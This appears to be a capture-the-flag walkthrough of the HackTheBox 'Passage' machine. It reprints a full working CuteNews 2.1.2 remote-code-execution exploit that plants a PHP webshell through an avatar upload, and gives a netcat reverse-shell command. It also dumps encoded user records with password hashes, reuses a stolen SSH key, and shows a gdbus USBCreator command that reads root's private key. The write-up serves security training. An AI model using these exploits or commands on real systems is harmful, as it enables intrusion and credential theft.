Hack The Box

HackTheBox “Passage” Walkthrough

Passage, a medium-level Linux OS machine on HackTheBox, features a CuteNews web application susceptible to a remote command execution vulnerability. Exploiting this flaw provides initial access. After cracking a…

Passage, a medium-level Linux OS machine on HackTheBox, features a CuteNews web application susceptible to a remote command execution vulnerability. Exploiting this flaw provides initial access. After cracking a CuteNews password hash for the user paul, password reuse facilitates lateral movement to the paul system user. Discovery of a shared SSH key enables further lateral progression to the user nadav, a sudo group member. Examining the results of the linpeas bash script uncovers an edited com.ubuntu.USBCreator.conf policy, granting sudo group members access to usb-creator service methods. Exploiting a vulnerability in the D-Bus service USBCreator bypasses the password security policy, allowing privileged file access as root.

HackTheBox “Passage” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

HackTheBox “Passage” Walkthrough, figure 2

Check port 80.

HackTheBox “Passage” Walkthrough, figure 3

CuteNews, a PHP news management system, is utilized. Upon investigation, the login page for CuteNews CMS is identified at http://10.10.10.206/CuteNews.

HackTheBox “Passage” Walkthrough, figure 4

The platform employs CuteNews 2.1.2, let’s searchsploit it.

HackTheBox “Passage” Walkthrough, figure 5

A remote code execution vulnerability 48800 has been identified. Let’s delve into the details of the exploit.

┌──(kali㉿kali)-[~/Desktop]└─$ searchsploit -m 48800        Exploit: CuteNews 2.1.2 - Remote Code Execution      URL: https://www.exploit-db.com/exploits/48800     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py    Codes: CVE-2019-11447 Verified: TrueFile Type: Python script, ASCII text executableCopied to: /home/kali/Desktop/48800.py                                                                                                                                   ┌──(kali㉿kali)-[~/Desktop]└─$ cat 48800.py  # Exploit Title: CuteNews 2.1.2 - Remote Code Execution# Google Dork: N/A# Date: 2020-09-10# Exploit Author: Musyoka Ian# Vendor Homepage: https://cutephp.com/cutenews/downloading.php# Software Link: https://cutephp.com/cutenews/downloading.php# Version: CuteNews 2.1.2# Tested on: Ubuntu 20.04, CuteNews 2.1.2# CVE : CVE-2019-11447#! /bin/env python3import requestsfrom base64 import b64decodeimport ioimport reimport stringimport randomimport sysbanner = """           _____     __      _  __                     ___   ___  ___          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/                                ___  _________                               / _ \/ ___/ __/                              / , _/ /__/ _/                             /_/|_|\___/___/"""print (banner)print ("[->] Usage python3 expoit.py")print ()sess = requests.session()payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"ip = input("Enter the URL> ")def extract_credentials():    global sess, ip    url = f"{ip}/CuteNews/cdata/users/lines"    encoded_creds = sess.get(url).text    buff = io.StringIO(encoded_creds)    chash = buff.readlines()    if "Not Found" in encoded_creds:            print ("[-] No hashes were found skipping!!!")            return    else:        for line in chash:            if "<?php die('Direct call - access denied'); ?>" not in line:                credentials = b64decode(line)                try:                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)                    print (sha_hash)                except:                    passdef register():    global sess, ip    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))    postdata = {        "action" : "register",        "regusername" : userpass,        "regnickname" : userpass,        "regpassword" : userpass,        "confirm" : userpass,        "regemail" : f"{@hack.me">userpass}@hack.me"    }    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)    if 302 == register.status_code:        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")    else:        sys.exit()def send_payload(payload):    global ip    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)    print (f"signature_key: {signature_key}")    print (f"signature_dsi: {signature_dsi}")    print (f"logged in user: {logged_user}")    files = {        "mod" : (None, "main"),        "opt" : (None, "personal"),        "__signature_key" : (None, f"{signature_key}"),        "__signature_dsi" : (None, f"{signature_dsi}"),        "editpassword" : (None, ""),        "confirmpassword" : (None, ""),        "editnickname" : (None, logged_user),        "avatar_file" : (f"{logged_user}.php", payload),        "more[site]" : (None, ""),        "more[about]" : (None, "")    }    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text    print("============================\nDropping to a SHELL\n============================")    while True:        print ()        command = input("command > ")        postdata = {"cmd" : command}        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)        if 404 == output.status_code:            print ("sorry i can't find your webshell try running the exploit again")            sys.exit()        else:            output = re.sub("GIF8;", "", output.text)            print (output.strip())if __name__ == "__main__":    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")    extract_credentials()    print ("================================================================")    print()    print ("=============================\nRegistering a users\n=============================")    register()    print()    print("=======================================================\nSending Payload\n=======================================================")    send_payload(payload)    print ()

The provided Python script leverages a Remote Code Execution (RCE) vulnerability in CuteNews 2.1.2 (CVE-2019–11447). Its key actions include extracting user credentials, registering a new user with random credentials, and exploiting the RCE by uploading a PHP file as the user’s avatar. This results in the establishment of a command shell on the server, enabling the execution of arbitrary commands.

To execute the exploit, specify the URL of the vulnerable CuteNews application.

HackTheBox “Passage” Walkthrough, figure 6

Run a listener to upgrade our shell:

HackTheBox “Passage” Walkthrough, figure 7

Run a reverse shell command: nc -e /bin/sh 10.10.14.6 4343

HackTheBox “Passage” Walkthrough, figure 8

Checking our listener.

HackTheBox “Passage” Walkthrough, figure 9

Initiate a TTY shell and begin scanning the CMS directory.

HackTheBox “Passage” Walkthrough, figure 10

We locate the “cdata” folder and observe a “users” subfolder while navigating inside.

HackTheBox “Passage” Walkthrough, figure 11

In the ‘users’ folder, we review the PHP files.

www-data@passage:/var/www/html/CuteNews/cdata/users$ ls ls 05.php  21.php  52.php  6e.php  95.php  c8.php  f8.php09.php  30.php  5d.php  77.php  97.php  d4.php  fc.php0a.php  32.php  66.php  7a.php  b0.php  d5.php  lines16.php  4c.php  6a.php  8f.php  bb.php  d6.php  users.txtwww-data@passage:/var/www/html/CuteNews/cdata/users$ cat *.phpcat *.php<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTcwMDMxNzUyNztzOjEwOiJ2TWFYZldRa1prIjt9fQ==<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319<?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=<?php die('Direct call - access denied'); ?>YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IkhsRWJHaXVFRmxAaGFjay5tZSI7czoxMDoiSGxFYkdpdUVGbCI7fXM6MjoiaWQiO2E6MTp7aToxNzAwMzI4OTg5O3M6MTA6IkIzcmlWOE1SdXYiO319<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODkxMDg5NjtzOjY6ImhhY2tlciI7fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoidk1hWGZXUWtaayI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzE3NTI3IjtzOjQ6Im5hbWUiO3M6MTA6InZNYVhmV1FrWmsiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6InZNYVhmV1FrWmtAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJ2TWFYZldRa1prIjtzOjQ6InBhc3MiO3M6NjQ6IjBkZGY1MTY0OTc2MDk2NzI5ZmQ5M2ZiYjE5MTBjMmRlM2YxMzBhZWY1MTViMGU1M2RjYzdmMjk3NmQyYTk2NzEiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX3ZNYVhmV1FrWmtfdk1hWGZXUWtaay5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319<?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiQjNyaVY4TVJ1diI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzI4OTg5IjtzOjQ6Im5hbWUiO3M6MTA6IkIzcmlWOE1SdXYiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IkIzcmlWOE1SdXZAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJCM3JpVjhNUnV2IjtzOjQ6InBhc3MiO3M6NjQ6IjZhZWE3MTAwNDVhNGViOWIyM2I1ZDYwNDI5ZmI0YzRjYmI2MDAyMTZlMWRmZTNmMjEzNDVhOTdmMTFlMDZjY2EiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX0IzcmlWOE1SdXZfQjNyaVY4TVJ1di5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==<?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==<?php die('Direct call - access denied'); ?>YToyOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiSGxFYkdpdUVGbCI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzI3NjM0IjtzOjQ6Im5hbWUiO3M6MTA6IkhsRWJHaXVFRmwiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IkhsRWJHaXVFRmxAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJIbEViR2l1RUZsIjtzOjQ6InBhc3MiO3M6NjQ6IjdmZWZjZmEzOTk5OTRkNzU2ZWY0NjVmNDYxNmI3YmJhOTNlYjliNmM0YzgzZDEzZDljODQyMDQ1MTkxOWYzMTAiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX0hsRWJHaXVFRmxfSGxFYkdpdUVGbC5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX1zOjU6ImVtYWlsIjthOjE6e3M6MTg6IkIzcmlWOE1SdXZAaGFjay5tZSI7czoxMDoiQjNyaVY4TVJ1diI7fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319<?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19<?php die('Direct call - access denied'); ?>YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6InZNYVhmV1FrWmtAaGFjay5tZSI7czoxMDoidk1hWGZXUWtaayI7fX0=<?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=<?php die('Direct call - access denied'); ?><?php die('Direct call - access denied'); ?><?php die('Direct call - access denied'); ?>YToxOntzOjQ6Im5hbWUiO2E6Mjp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg5MDY4ODEiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3lreG5hY3B0LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9czo2OiJoYWNrZXIiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg5MTA4OTYiO3M6NDoibmFtZSI7czo2OiJoYWNrZXIiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjQ6Im5pY2siO3M6NjoiaGFja2VyIjtzOjQ6InBhc3MiO3M6NjQ6ImU3ZDM2ODU3MTU5Mzk4NDI3NDljYzI3YjM4ZDBjY2I5NzA2ZDRkMTRhNTMwNGVmOWVlZTA5Mzc4MGVhYjVkZjkiO3M6MzoibHRzIjtzOjEwOiIxNTk4OTEwOTExIjtzOjM6ImJhbiI7czoxOiIwIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czo2OiJhdmF0YXIiO3M6MjY6ImF2YXRhcl9oYWNrZXJfanB5b3lza3QucGhwIjtzOjY6ImUtaGlkZSI7czowOiIiO319fQ==<?php die('Direct call - access denied'); ?>YToxOntzOjI6ImlkIjthOjE6e2k6MTcwMDMyNzYzNDtzOjEwOiJIbEViR2l1RUZsIjt9fQ==<?php die('Direct call - access denied'); ?>

We decode the content using a Base64 decoder.

HackTheBox “Passage” Walkthrough, figure 12

It appears to be serialized, with user-password hashes. Notably, the hash for the user “paul” is found in the screenshot above:

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

Let’s submit this hash to crackstation.net.

HackTheBox “Passage” Walkthrough, figure 13

Switch to ‘paul’ user.

HackTheBox “Passage” Walkthrough, figure 14

While navigating into the .ssh directory, we locate the id_rsa and id_rsa.pub files.

HackTheBox “Passage” Walkthrough, figure 15

Let’s have a look at the id files.

HackTheBox “Passage” Walkthrough, figure 16

We transfer the id_rsa to the our attack box.

HackTheBox “Passage” Walkthrough, figure 17

We access the target machine as the user “nadav.”

HackTheBox “Passage” Walkthrough, figure 18

Upon SSH login, we navigate to the temp folder, transfer the LinPEAS script, and execute it.

HackTheBox “Passage” Walkthrough, figure 19

LinPEAS results revealed the target machine’s vulnerability to the USBCreator D-Bus Exploit.

HackTheBox “Passage” Walkthrough, figure 20

We researched this exploit to determine its potential for elevating privileges on the target machine.

HackTheBox “Passage” Walkthrough, figure 21

The USBCreator D-Bus interface vulnerability enables a user in the sudoers group to bypass sudo’s password security policy. Exploiting this flaw allows an attacker to overwrite/read arbitrary files with root privileges, leading to elevated access. Utilizing gdbus, the attacker can exploit USBCreator to read the root user’s id_rsa file and copy its contents to a text file.

Exploit command:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_root true

HackTheBox “Passage” Walkthrough, figure 22

We utilize the generated key for direct SSH login from the target machine.

HackTheBox “Passage” Walkthrough, figure 23